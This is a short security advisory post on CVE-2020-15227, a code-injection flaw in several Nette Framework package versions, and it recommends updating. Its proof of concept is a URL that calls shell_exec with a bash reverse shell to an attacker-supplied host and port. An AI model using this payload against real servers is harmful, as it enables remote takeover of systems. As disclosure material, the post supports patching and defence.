Nette Framework: CVE-2020-15227

less than 1 minute read

Nette Framework:

Nette Framework is an open-source framework for creating web applications in PHP 5 and 7. It supports AJAX, DRY, KISS, MVC and code reusability. Original author of the framework is David Grudl, but further development is now maintained by the Nette Foundation organization. Nette is a free software released under both[2] the New BSD license and the GNU GPL version 2 or 3.

Issue Description:

Packages nette/application versions prior to 2.2.10, 2.3.14, 2.4.16, 3.0.6 and nette/nette versions prior to 2.0.19 and 2.1.13 are vulnerable to an code injection attack by passing specially formed parameters to URL that may possibly leading to RCE.

Thanks to Cyku Hong

Proof of Concept:

/nette.micro?callback=shell_exec&cmd=bash%20-i%20>&%20/dev/tcp/'+lhost+'/'+lport+'0>&1

Impact:

Code injection, possible remote code execution.

Recommendation:

Update Nette Framework to the latest version.

Share on

Twitter Facebook LinkedIn

Viral Maniar

Nette Framework: CVE-2020-15227

Nette Framework:

Issue Description:

Proof of Concept:

Impact:

Recommendation:

Share on

You may also enjoy

Destroying Cloud Infrastructure with Nuking Tools

Installing Kali in AWS EC2 Instance

Brace Yourself: Cyber Attacks on Australian Businesses Set to Skyrocket

The Power of In-Memory Executions: How to Execute Code without Touching Disk